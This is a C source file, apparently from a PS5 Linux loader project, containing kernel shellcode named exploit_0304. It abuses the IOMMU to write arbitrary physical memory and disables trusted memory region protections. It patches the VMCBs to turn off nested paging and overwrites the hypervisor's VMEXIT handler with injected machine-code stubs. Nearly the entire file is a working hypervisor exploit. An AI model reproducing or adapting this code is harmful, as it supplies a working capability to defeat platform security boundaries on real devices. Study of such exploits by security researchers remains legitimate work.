Files
ps5-linux-loader/shellcode_kernel/exploit_0304.c
2026-05-13 16:31:10 +02:00

154 lines
5.6 KiB
C

#include "exploit_0304.h"
#include "../include/config.h"
#include "shellcode_kernel_args.h"
#include "utils.h"
// Function-pointer prototypes for the hypervisor's IOMMU services.
// NOTE(review): these globals are never assigned or called in the code
// visible here — disable_npts_0304() casts args_ptr->fun_* directly instead.
// They may be used elsewhere in the project; confirm before removing.
uint32_t (*hv_iommu_set_buffers)(uint64_t cb2_pa, uint64_t cb3_pa,
                                 uint64_t eb_pa, uint64_t unk, int *n_devices);
uint32_t (*hv_iommu_wait_completion)(void);
int disable_npts_0304(volatile shellcode_kernel_args *args_ptr) {
uint64_t iommu_cb2_pa = vtophys(args_ptr->dmap_base, args_ptr->iommu_cb2_va);
uint64_t iommu_cb3_pa = vtophys(args_ptr->dmap_base, args_ptr->iommu_cb3_va);
uint64_t iommu_eb_pa = vtophys(args_ptr->dmap_base, args_ptr->iommu_eb_va);
uint64_t unk;
int n_devices;
// Reconfigure IOMMU calling the HV
int ret = ((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t,
int *))args_ptr->fun_hv_iommu_set_buffers)(
iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, (uint64_t)&unk, &n_devices);
if (ret != 0) {
puts_uart(args_ptr->dmap_base, (char[]){"IOMMU sb X\n"});
return -1;
}
ret = ((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)();
if (ret) {
puts_uart(args_ptr->dmap_base, (char[]){"IOMMU sb NO OK\n"});
return -1;
}
puts_uart(args_ptr->dmap_base, (char[]){"IOMMU sb OK\n"});
if (tmr_disable(args_ptr->dmap_base)) {
puts_uart(args_ptr->dmap_base, (char[]){"TMR NO OK\n"});
return -1;
}
puts_uart(args_ptr->dmap_base, (char[]){"TMR OK\n"});
patch_vmcb(args_ptr);
puts_uart(args_ptr->dmap_base, (char[]){"VMCB OK\n"});
// Re-do this to force a VMEXIT without HV injecting faults
((uint64_t(*)(uint64_t, uint64_t, uint64_t, uint64_t,
int *))args_ptr->fun_hv_iommu_set_buffers)(
iommu_cb2_pa, iommu_cb3_pa, iommu_eb_pa, (uint64_t)&unk, &n_devices);
((uint64_t(*)(void))args_ptr->fun_hv_iommu_wait_completion)();
puts_uart(args_ptr->dmap_base, (char[]){"Back from HV\n"});
return 0;
}
// Hijack the hypervisor's VMEXIT handler. Two stages:
//   1. overwrite the VMEXIT handler entry with a jump into a code cave;
//   2. fill that cave with a stub that loads our CR3 and jumps to the main
//      HV shellcode.
// All writes go through PHYS_TO_DMAP (the kernel direct map). `args`,
// `cave_hv_paging` and `cave_hv_code` come from the included headers/config.
void patch_hv_0304(void) {
  // Stage-1 stub — jump to shellcode final identity mapping. The imm32
  // (0x62806f00 shown in the byte comment) is a placeholder patched below;
  // trailing 0xC3 bytes are ret padding.
  uint8_t shellcode_jmp[] = {
      0x48, 0xC7, 0xC0, 0x00, 0x6F, 0x80, 0x62, // mov rax, 0x62806f00
      0xFF, 0xE0, 0xC3, 0xC3, 0xC3, 0xC3, 0xC3, // jmp rax
      0xC3, 0xC3};
  // Update code cave in hv 1:1 region: patch the imm32 at offset 3 with the
  // real cave PA. NOTE(review): this `mov rax, imm32` encoding sign-extends
  // the immediate — assumes the cave PA fits in 31 bits; confirm vs config.
  *(uint32_t *)(&shellcode_jmp[3]) = (uint32_t)args.hv_code_cave_pa;
  // Just patch the VMEXIT handler directly, avoiding all checks
  memcpy((void *)PHYS_TO_DMAP(args.hv_handle_vmexit_pa), shellcode_jmp,
         sizeof(shellcode_jmp));
  // Stage-2 stub placed in the cave: install our page tables, then jump to
  // the main HV shellcode. Both movabs immediates are placeholders.
  uint8_t shellcode_identity_and_jmp[] = {
      0x48, 0xB8, 0x00, 0x00, 0x00,
      0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100000000
      0x0F, 0x22, 0xD8,             // mov cr3, rax
      0x48, 0xB8, 0x00, 0x30, 0x00,
      0x00, 0x01, 0x00, 0x00, 0x00, // movabs rax, 0x100003000
      0xFF, 0xE0                    // jmp rax
  };
  // Update CR3 PA (from config). These are unaligned 8-byte stores into the
  // byte array — fine on x86.
  *(uint64_t *)(&shellcode_identity_and_jmp[2]) = cave_hv_paging;
  // Update HV shellcode cave (jump target of the second movabs).
  *(uint64_t *)(&shellcode_identity_and_jmp[15]) = cave_hv_code;
  // Install shellcode to update CR3 and jump to main HV shellcode
  memcpy((void *)PHYS_TO_DMAP(args.hv_code_cave_pa), shellcode_identity_and_jmp,
         sizeof(shellcode_identity_and_jmp));
}
// Append one 16-byte command to the IOMMU command buffer and busy-wait until
// the device has consumed it.
// Compiled noinline/O0 so the MMIO accesses below are emitted exactly in
// program order even though the MMIO pointers are not volatile-qualified.
__attribute__((noinline, optimize("O0"))) void
iommu_submit_cmd(volatile shellcode_kernel_args *args_ptr, uint64_t *cmd) {
  // Current producer position (byte offset) from the MMIO tail register.
  uint64_t curr_tail =
      *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8);
  // Next tail, wrapped to the command-buffer size.
  uint64_t next_tail = (curr_tail + IOMMU_CMD_ENTRY_SIZE) & IOMMU_CB_MASK;
  // Slot for this command inside command buffer 2.
  uint64_t *cmd_buffer = (uint64_t *)args_ptr->iommu_cb2_va + curr_tail / 8;
  cmd_buffer[0] = cmd[0];
  cmd_buffer[1] = cmd[1];
  // Compiler barrier: the command bytes must be in memory before the tail
  // update makes them visible to the device.
  __asm__ volatile("" : : : "memory");
  *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8) = next_tail;
  // Spin until the device's head pointer catches up with the new tail,
  // i.e. the command has been fetched.
  while (*((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_HEAD / 8) !=
         *((uint64_t *)args_ptr->iommu_mmio_va + IOMMU_MMIO_CB_TAIL / 8))
    ;
}
// Write 8 bytes at an arbitrary physical address by submitting an IOMMU
// command whose completion store targets `pa` — the device performs the
// write on our behalf (looks like an AMD-style COMPLETION_WAIT with the
// Store flag; confirm against the IOMMU spec).
__attribute__((noinline, optimize("O0"))) void
iommu_write8_pa(volatile shellcode_kernel_args *args_ptr, uint64_t pa,
                uint64_t val) {
  uint32_t addr_lo = (uint32_t)(pa & 0xFFFFFFF8); // 8-byte-aligned low bits
  uint32_t addr_hi = (uint32_t)(pa >> 32) & 0xFFFFF;
  uint32_t words[4] = {0};
  words[0] = addr_lo | 0x05;       // store-target PA + flag bits
  words[1] = addr_hi | 0x10000000; // upper PA bits + command opcode
  words[2] = (uint32_t)val;        // low half of the value to store
  words[3] = (uint32_t)(val >> 32); // high half
  iommu_submit_cmd(args_ptr, (uint64_t *)words);
}
// Patch all 16 VMCBs whose physical addresses the caller supplies in
// args_ptr->vmcb[], using IOMMU DMA writes (iommu_write8_pa) so the
// hypervisor's write protection of those pages is bypassed.
// NOTE(review): the offsets look like the AMD SVM VMCB control area — in
// particular +0x90 would be NP_ENABLE (cleared here, i.e. nested paging
// off, matching this exploit's purpose) and +0x58 the guest ASID. Confirm
// field meanings against the AMD APM vol. 2 before modifying.
__attribute__((noinline, optimize("O0"))) void
patch_vmcb(volatile shellcode_kernel_args *args_ptr) {
  for (int i = 0; i < 16; i++) {
    uint64_t pa = args_ptr->vmcb[i];
    iommu_write8_pa(args_ptr, pa + 0x00, 0x0000000000000000ULL);
    iommu_write8_pa(args_ptr, pa + 0x08, 0x0004000000000000ULL);
    iommu_write8_pa(args_ptr, pa + 0x10, 0x000000000000000FULL);
    iommu_write8_pa(args_ptr, pa + 0x58, 0x0000000000000001ULL);
    iommu_write8_pa(args_ptr, pa + 0x90, 0x0000000000000000ULL);
  }
}
// Read a TMR register through the index/data window of the PCI function at
// ECAM_B0D18F2 (bus 0, device 0x18, function 2 per the macro name), reached
// via the kernel direct map. O0 keeps the index store ordered before the
// data load despite the non-volatile pointers.
__attribute__((noinline, optimize("O0"))) uint32_t tmr_read(uint64_t dmap,
                                                            uint32_t addr) {
  *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr; // select register
  return *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF);  // read its value
}
// Write a TMR register through the same index/data window tmr_read() uses.
// O0 keeps the two stores (index select, then data) in program order.
__attribute__((noinline, optimize("O0"))) void
tmr_write(uint64_t dmap, uint32_t addr, uint32_t val) {
  *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_INDEX_OFF) = addr; // select register
  *(uint32_t *)(dmap + ECAM_B0D18F2 + TMR_DATA_OFF) = val;   // write its value
}
// Clear the config register of all 24 TMR slots.
// Returns 0 when every slot reads back zero, -1 if any write fails to stick
// (read-back after the clear is still non-zero).
__attribute__((noinline, optimize("O0"))) int tmr_disable(uint64_t dmap) {
  for (int slot = 0; slot < 24; slot++) {
    if (tmr_read(dmap, TMR_CONFIG(slot)) == 0)
      continue; // already clear, nothing to do
    tmr_write(dmap, TMR_CONFIG(slot), 0);
    if (tmr_read(dmap, TMR_CONFIG(slot)) != 0)
      return -1; // clear was refused
  }
  return 0;
}